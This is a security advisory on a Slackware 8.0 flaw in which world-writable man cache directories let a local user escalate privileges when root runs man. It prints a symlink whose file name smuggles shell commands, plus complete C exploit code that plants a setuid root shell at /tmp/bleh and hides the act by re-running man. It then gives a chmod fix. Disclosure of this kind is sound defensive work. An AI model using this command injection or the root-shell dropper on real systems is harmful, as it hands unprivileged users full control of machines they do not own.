COMMAND

    /usr/bin/man

SYSTEMS AFFECTED

    Slackware 8.0 and before

PROBLEM

    Josh Lockdown and zen-parse found the following.  Slackware 8.0 and
    previous releases of Slackware ship with the /var/man/cat*/
    directories chmod 1777:

        drwxrwxrwt 2 root root 4096 Jul 11 11:03 cat*/

    Since these directories are world-writable, we can create symlinks
    there like so:

    `ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.  ;script;man.7"
    /var/man/cat7/man.7.gz`

    When `/usr/bin/man man` is executed by root, it will create
    /var/man/cat7/man.7.gz.  The symlink forces it to create a file in
    /usr/man/man7 named:

        /usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;script;man.7.gz

    /usr/bin/man will then execute /tmp/script which contains:

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/wait.h>
    #include <errno.h>
    
    /*
     * Payload stage of the advisory's PoC: this is what ends up running as
     * /tmp/script via the PATH=. trick described above. Any uid can reach
     * it; only uid 0 (root running `man`) takes the privileged branch.
     */
    int main()
    {
      FILE *fil;
      /* setuid + setgid bits plus rwx for the owner and execute-only for
       * everyone else. Applied below by uid 0, so the resulting
       * /tmp/bleh is the root-owned artifact to look for when triaging
       * a host. */
      mode_t perm = 06711;
    
      if(!getuid()) {
        /* Writes a tiny helper that switches to uid/gid 0 and execs
         * /bin/su, then compiles it with the system gcc. Return values
         * of fopen()/system() are not examined. */
        fil = fopen("/tmp/bleh.c","w");
        fprintf(fil,"%s\n","#include <unistd.h>");
        fprintf(fil,"%s\n","#include <stdio.h>");
        fprintf(fil,"%s\n","int main() {");
        fprintf(fil,"%s\n","setreuid(0,0);setregid(0,0);");
        fprintf(fil,"%s\n","execl(\"/bin/su\",\"su\",NULL);");
        fprintf(fil,"%s\n","return 0; }");
        fclose(fil);
        system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
        /* The source is removed; only the compiled binary is left behind. */
        unlink("/tmp/bleh.c");
        chmod("/tmp/bleh", perm);
      }
       /* Re-runs man on the real section-7 page, presumably so the
        * original invocation still appears to behave normally. */
       execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
       return 0;
    }

    With the above code compiled  in /tmp/script, if root were  to run
    `man man`, a suid shell would be left in /tmp/bleh.

SOLUTION

    Temporary Fix:

        chmod 700 /var/man/cat*

    This removes write access for unprivileged users, so symlinks can no
    longer be planted in the cat directories.